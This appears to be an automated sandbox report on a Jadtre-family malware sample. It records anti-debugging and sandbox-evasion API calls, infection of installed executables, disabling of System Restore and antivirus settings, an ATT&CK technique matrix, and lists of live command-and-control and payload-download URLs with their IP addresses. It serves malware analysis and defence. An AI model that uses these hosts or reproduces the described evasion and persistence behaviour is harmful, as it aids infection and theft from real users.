        Source: C:\Windows\94000696690303050\winsvcs.exeAPI call chain: ExitProcess graph end nodegraph_6-13009
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00425036
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00425CCD VirtualProtect ?,-00000001,00000104,?0_2_00425CCD
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00479044 mov eax, dword ptr fs:[00000030h]0_2_00479044
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_02513134 mov eax, dword ptr fs:[00000030h]0_2_02513134
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_02511560 mov eax, dword ptr fs:[00000030h]0_2_02511560
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00479044 mov eax, dword ptr fs:[00000030h]6_2_00479044
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_02323134 mov eax, dword ptr fs:[00000030h]6_2_02323134
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_02321560 mov eax, dword ptr fs:[00000030h]6_2_02321560
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00479044 mov eax, dword ptr fs:[00000030h]9_2_00479044
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_02201560 mov eax, dword ptr fs:[00000030h]9_2_02201560
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_02203134 mov eax, dword ptr fs:[00000030h]9_2_02203134
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00479044 mov eax, dword ptr fs:[00000030h]14_2_00479044
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_02313134 mov eax, dword ptr fs:[00000030h]14_2_02313134
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_02311560 mov eax, dword ptr fs:[00000030h]14_2_02311560
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00423CAD GetProcessHeap,HeapFree,0_2_00423CAD
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00425036
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_0042CD04 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042CD04
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00426E9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00426E9B
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00425036
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_0042CD04 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0042CD04
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00426E9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00426E9B
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00425036
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_0042CD04 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0042CD04
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00426E9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00426E9B
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00425036 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00425036
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_0042CD04 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0042CD04
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00426E9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00426E9B
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" "
        Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_004360A0 cpuid 0_2_004360A0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: GetLocaleInfoA,0_2_00431AD1
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: GetLocaleInfoA,6_2_00431AD1
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: GetLocaleInfoA,9_2_00431AD1
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: GetLocaleInfoA,14_2_00431AD1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_0040B517 GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA,LoadImageA,LoadImageA,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,GetDlgItem,GetClientRect,MoveWindow,InvalidateRect,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,CreateFontIndirectA,SelectObject,SendMessageA,SetTextColor,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,MoveToEx,LineTo,CreateSolidBrush,LoadCursorA,LoadIconA,GetModuleHandleA,LoadIconA,CreateWindowExA,GetClientRect,CreateWindowExW,CreateWindowExW,LoadBitmapA,SendMessageA,GetModuleHandleA,LoadBitmapA0_2_0040B517
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_0061139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_0061139F

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Windows\94000696690303050\winsvcs.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSRJump to behavior
        Source: XBVdJN.exe, 00000001.00000003.2333120316.00000000011DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Windows Defender\MsMpEng.exe
        Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: XBVdJN.exe PID: 6516, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: XBVdJN.exe PID: 6256, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: XBVdJN.exe PID: 3768, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: XBVdJN.exe PID: 6516, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: XBVdJN.exe PID: 6256, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: XBVdJN.exe PID: 3768, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        1
        Replication Through Removable Media
        23
        Native API
        1
        Scripting
        1
        DLL Side-Loading
        11
        Disable or Modify Tools
        11
        Input Capture
        11
        System Time Discovery
        1
        Taint Shared Content
        1
        Archive Collected Data
        4
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        Inhibit System Recovery
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory1
        Peripheral Device Discovery
        Remote Desktop Protocol11
        Input Capture
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt11
        Registry Run Keys / Startup Folder
        12
        Process Injection
        3
        Obfuscated Files or Information
        Security Account Manager4
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive11
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
        Registry Run Keys / Startup Folder
        22
        Software Packing
        NTDS124
        System Information Discovery
        Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        Query Registry
        SSHKeylogging13
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
        Masquerading
        Cached Domain Credentials231
        Security Software Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Virtualization/Sandbox Evasion
        DCSync11
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc Filesystem3
        Process Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
        Process Injection
        /etc/passwd and /etc/shadow1
        Application Window Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Hidden Files and Directories
        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481855 Sample: LisectAVT_2403002B_290.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 58 ww88.ssofhoseuegsgrfnu.ru 2->58 60 ssofhoseuegsgrfnj.net 2->60 62 90 other IPs or domains 2->62 64 Antivirus detection for URL or domain 2->64 66 Antivirus detection for dropped file 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 70 9 other signatures 2->70 9 LisectAVT_2403002B_290.exe 2 3 2->9         started        13 winsvcs.exe 2->13         started        15 winsvcs.exe 2->15         started        signatures3 process4 file5 46 C:\Windows\94000696690303050\winsvcs.exe, PE32 9->46 dropped 48 C:\Users\user\AppData\Local\Temp\XBVdJN.exe, PE32 9->48 dropped 84 Detected unpacking (changes PE section rights) 9->84 86 Detected unpacking (overwrites its own PE header) 9->86 88 Found evasive API chain (may stop execution after checking mutex) 9->88 92 5 other signatures 9->92 17 winsvcs.exe 8 26 9->17         started        22 XBVdJN.exe 16 9->22         started        90 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->90 24 XBVdJN.exe 1 26 13->24         started        26 XBVdJN.exe 15->26         started        signatures6 process7 dnsIp8 50 aiiaiafrzrueuedur.net 185.215.113.66, 49760, 80 WHOLESALECONNECTIONSNL Portugal 17->50 52 ssofhoseuegsgrfnj.in 208.100.26.245, 49754, 80 STEADFASTUS United States 17->52 56 10 other IPs or domains 17->56 38 C:\Users\user\...\Windows Archive Manager.exe, PE32 17->38 dropped 72 Antivirus detection for dropped file 17->72 74 Detected unpacking (changes PE section rights) 17->74 76 Detected unpacking (overwrites its own PE header) 17->76 82 7 other signatures 17->82 54 fiiauediehduefuge.ru 44.221.84.105, 49722, 49724, 49731 AMAZON-AESUS United States 22->54 40 C:\Program Files\7-Zip\Uninstall.exe, PE32 22->40 dropped 42 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 22->42 dropped 44 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 22->44 dropped 78 Machine Learning detection for dropped file 22->78 80 Infects executable files (exe, dll, sys, html) 22->80 28 WerFault.exe 22 16 22->28         started        30 cmd.exe 24->30         started        32 cmd.exe 26->32         started        file9 signatures10 process11 process12 34 conhost.exe 30->34         started        36 conhost.exe 32->36         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        LisectAVT_2403002B_290.exe100%AviraW32/Jadtre.B
        LisectAVT_2403002B_290.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\XBVdJN.exe100%AviraTR/Dldr.Small.Z.haljq
        C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe100%AviraW32/Jadtre.B
        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
        C:\Windows\94000696690303050\winsvcs.exe100%AviraW32/Jadtre.B
        C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
        C:\Users\user\AppData\Local\Temp\XBVdJN.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe100%Joe Sandbox ML
        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
        C:\Windows\94000696690303050\winsvcs.exe100%Joe Sandbox ML
        C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.activestate.comHolger0%URL Reputationsafe
        http://ddos.dnsnb8.net:799/cj//k3.rar100%URL Reputationmalware
        http://www.develop.comDeepak0%URL Reputationsafe
        http://www.activestate.com0%URL Reputationsafe
        http://www.spaceblue.comMathias0%URL Reputationsafe
        http://www.lua.org0%URL Reputationsafe
        http://ddos.dnsnb8.net/100%URL Reputationmalware
        http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://fiiauediehduefuge.ru/tldr.php?newinf=1100%Avira URL Cloudmalware
        https://www.smartsharesystems.com/0%URL Reputationsafe
        http://www.scintilla.org0%URL Reputationsafe
        http://www.baanboard.com0%URL Reputationsafe
        http://ssofhoseuegsgrfnj.su/tldr.php?newinf=1U10%Avira URL Cloudsafe
        http://nnososoosjfeuhueu.su/0%Avira URL Cloudsafe
        http://srndndubsbsifurfd.biz/100%Avira URL Cloudmalware
        http://afeifieuuufufufuf.net/100%Avira URL Cloudmalware
        http://slpsrgpsrhojifdij.biz/tldr.php?newinf=1O100%Avira URL Cloudmalware
        http://eiifngjfksisiufjf.info/0%Avira URL Cloudsafe
        http://eofihsishihiursgu.su/100%Avira URL Cloudmalware
        http://eoroooskfogihisrg.in/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://nousiieiffgogogoo.com/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://eoroooskfogihisrg.biz/tldr.php?newinf=1K100%Avira URL Cloudmalware
        http://eiifngjfksisiufjf.com/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://eoroooskfogihisrg.su/tldr.php?newinf=10%Avira URL Cloudsafe
        http://nnososoosjfeuhueu.info/0%Avira URL Cloudsafe
        http://afeifieuuufufufuf.su/tldr.php?newinf=1fo0%Avira URL Cloudsafe
        http://ssofhoseuegsgrfnu.ru/http://92.63.197.48/http://slpsrgpsrhojifdij.ru/http://aiiaiafrzrueuedur0%Avira URL Cloudsafe
        http://eoroooskfogihisrg.su/0%Avira URL Cloudsafe
        http://fifiehsueuufidhfi.net/tldr.php?newinf=1P100%Avira URL Cloudmalware
        http://fuaiuebndieufeufu.com/0%Avira URL Cloudsafe
        http://srndndubsbsifurfd.in/tldr.php?newinf=19h100%Avira URL Cloudmalware
        http://eoroooskfogihisrg.biz/tldr.php?newinf=1T100%Avira URL Cloudmalware
        http://aiiaiafrzrueuedur.info/100%Avira URL Cloudmalware
        http://eiifngjfksisiufjf.com/100%Avira URL Cloudmalware
        http://srndndubsbsifurfd.ru/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://fifiehsueuufidhfi.net/100%Avira URL Cloudmalware
        http://slpsrgpsrhojifdij.com/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://eoroooskfogihisrg.com/100%Avira URL Cloudmalware
        http://nousiieiffgogogoo.info/0%Avira URL Cloudsafe
        http://eoroooskfogihisrg.com/tldr.php?newinf=1w100%Avira URL Cloudmalware
        http://iuirshriuisruruuf.biz/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://ddos.dnsnb8.net:799/cj//k3.rarw100%Avira URL Cloudphishing
        http://afeifieuuufufufuf.in/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://afeifieuuufufufuf.su/tldr.php?newinf=10%Avira URL Cloudsafe
        http://nousiieiffgogogoo.su/tldr.php?newinf=1oh100%Avira URL Cloudmalware
        http://eoroooskfogihisrg.info/100%Avira URL Cloudmalware
        http://eofihsishihiursgu.ru/0%Avira URL Cloudsafe
        http://nnososoosjfeuhueu.net/tldr.php?newinf=1e0%Avira URL Cloudsafe
        http://iuirshriuisruruuf.com/100%Avira URL Cloudmalware
        http://noeuaoenriusfiruu.in/100%Avira URL Cloudmalware
        http://fifiehsueuufidhfi.biz/tldr.php?newinf=1.m0%Avira URL Cloudsafe
        http://srndndubsbsifurfd.biz/tldr.php?newinf=1Gj9100%Avira URL Cloudmalware
        http://srndndubsbsifurfd.su/http://fiiauediehduefuge.su/http://nousiieiffgogogoo.su/http://fifiehsue100%Avira URL Cloudmalware
        http://slpsrgpsrhojifdij.biz/100%Avira URL Cloudmalware
        http://ssofhoseuegsgrfnj.com/0%Avira URL Cloudsafe
        http://noeuaoenriusfiruu.com/tldr.php?newinf=1L0%Avira URL Cloudsafe
        http://nousiieiffgogogoo.ru/100%Avira URL Cloudmalware
        http://eiifngjfksisiufjf.in/0%Avira URL Cloudsafe
        http://afeifieuuufufufuf.in/100%Avira URL Cloudmalware
        http://eoroooskfogihisrg.net/tldr.php?newinf=1YA100%Avira URL Cloudmalware
        http://iuirshriuisruruuf.ru/100%Avira URL Cloudmalware
        http://fuaiuebndieufeufu.in/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://eofihsishihiursgu.net/tldr.php?newinf=1wA0%Avira URL Cloudsafe
        http://eofihsishihiursgu.com/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://fifiehsueuufidhfi.net/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://aiiaiafrzrueuedur.in/100%Avira URL Cloudmalware
        http://eofihsishihiursgu.net/tldr.php?newinf=1n0%Avira URL Cloudsafe
        http://fifiehsueuufidhfi.com/tldr.php?ne0%Avira URL Cloudsafe
        http://fiiauediehduefuge.com/tldr.php?newinf=1Ck%100%Avira URL Cloudmalware
        http://ddos.dnsnb8.net:799/cj//k3.rar:100%Avira URL Cloudmalware
        http://eoroooskfogihisrg.in/tldr.php?newinf=15i%100%Avira URL Cloudmalware
        http://ddos.dnsnb8.net:799/cj//k1.rark8100%Avira URL Cloudmalware
        http://afeifieuuufufufuf.info/0%Avira URL Cloudsafe
        http://srndndubsbsifurfd.net/tldr.php?newinf=1A100%Avira URL Cloudmalware
        http://aiiaiafrzrueuedur.com/0%Avira URL Cloudsafe
        http://afeifieuuufufufuf.com/tldr.php?newinf=1jk0%Avira URL Cloudsafe
        http://afeifieuuufufufuf.ru/tldr.php?newinf=10%Avira URL Cloudsafe
        http://eiifngjfksisiufjf.net/tldr.php?newinf=14A0%Avira URL Cloudsafe
        http://iuirshriuisruruuf.su/tldr.php?newinf=1so0%Avira URL Cloudsafe
        http://ddos.dnsnb8.net:799/cj//k4.rarT100%Avira URL Cloudphishing
        http://fuaiuebndieufeufu.net/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://aiiaiafrzrueuedur.com/tldr.php?newinf=10%Avira URL Cloudsafe
        http://iuirshriuisruruuf.net/100%Avira URL Cloudmalware
        http://nnososoosjfeuhueu.in/0%Avira URL Cloudsafe
        http://srndndubsbsifurfd.su/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://noeuaoenriusfiruu.net/tldr.php?newinf=1=BZ100%Avira URL Cloudmalware
        http://aiiaiafrzrueuedur.net/tldr.php?newinf=10B%0%Avira URL Cloudsafe
        http://nousiieiffgogogoo.su/100%Avira URL Cloudmalware
        http://fuaiuebndieufeufu.su/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://fifiehsueuufidhfi.su/100%Avira URL Cloudmalware
        http://afeifieuuufufufuf.net/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://fuaiuebndieufeufu.ru/tldr.php?newinf=10%Avira URL Cloudsafe
        http://slpsrgpsrhojifdij.net/tldr.php?newinf=10%Avira URL Cloudsafe
        http://afeifieuuufufufuf.com/0%Avira URL Cloudsafe
        http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1100%Avira URL Cloudmalware
        http://ssofhoseuegsgrfnj.biz/tldr.php?newinf=10%Avira URL Cloudsafe
        http://ddos.dnsnb8.net:799/cj//k2.rarh?p100%Avira URL Cloudmalware
        http://srndndubsbsifurfd.in/tldr.php?newinf=1100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        86537.BODIS.COM
        199.59.243.226
        truefalse
          unknown
          ssofhoseuegsgrfnj.su
          92.246.89.93
          truefalse
            unknown
            aiiaiafrzrueuedur.ru
            92.246.89.93
            truefalse
              unknown
              eiifngjfksisiufjf.in
              44.213.104.86
              truefalse
                unknown
                afeifieuuufufufuf.com
                74.119.239.234
                truefalse
                  unknown
                  eofihsishihiursgu.net
                  44.213.104.86
                  truefalse
                    unknown
                    noeuaoenriusfiruu.biz
                    54.244.188.177
                    truefalse
                      unknown
                      aiiaiafrzrueuedur.net
                      185.215.113.66
                      truefalse
                        unknown
                        ssofhoseuegsgrfnj.in
                        208.100.26.245
                        truefalse
                          unknown
                          iuirshriuisruruuf.in
                          44.221.84.105
                          truefalse
                            unknown
                            fifiehsueuufidhfi.biz
                            54.244.188.177
                            truefalse
                              unknown
                              fifiehsueuufidhfi.com
                              54.244.188.177
                              truefalse
                                unknown
                                ssofhoseuegsgrfnj.biz
                                54.244.188.177
                                truefalse
                                  unknown
                                  slpsrgpsrhojifdij.ru
                                  92.246.89.93
                                  truefalse
                                    unknown
                                    ddos.dnsnb8.net
                                    44.221.84.105
                                    truefalse
                                      unknown
                                      nousiieiffgogogoo.net
                                      18.141.10.107
                                      truefalse
                                        unknown
                                        fiiauediehduefuge.ru
                                        44.221.84.105
                                        truefalse
                                          unknown
                                          ssofhoseuegsgrfnu.ru
                                          170.39.226.155
                                          truefalse
                                            unknown
                                            fuaiuebndieufeufu.com
                                            54.244.188.177
                                            truefalse
                                              unknown
                                              eiifngjfksisiufjf.biz
                                              34.218.204.173
                                              truefalse
                                                unknown
                                                afeifieuuufufufuf.su
                                                92.246.89.93
                                                truefalse
                                                  unknown
                                                  slpsrgpsrhojifdij.net
                                                  13.251.16.150
                                                  truefalse
                                                    unknown
                                                    iuirshriuisruruuf.biz
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      aiiaiafrzrueuedur.in
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        nnososoosjfeuhueu.com
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          eiifngjfksisiufjf.ru
                                                          unknown
                                                          unknowntrue
                                                            unknown
                                                            noeuaoenriusfiruu.su
                                                            unknown
                                                            unknowntrue
                                                              unknown
                                                              fuaiuebndieufeufu.net
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                srndndubsbsifurfd.com
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  slpsrgpsrhojifdij.biz
                                                                  unknown
                                                                  unknowntrue
                                                                    unknown
                                                                    fuaiuebndieufeufu.biz
                                                                    unknown
                                                                    unknowntrue
                                                                      unknown
                                                                      eofihsishihiursgu.in
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        nousiieiffgogogoo.su
                                                                        unknown
                                                                        unknowntrue
                                                                          unknown
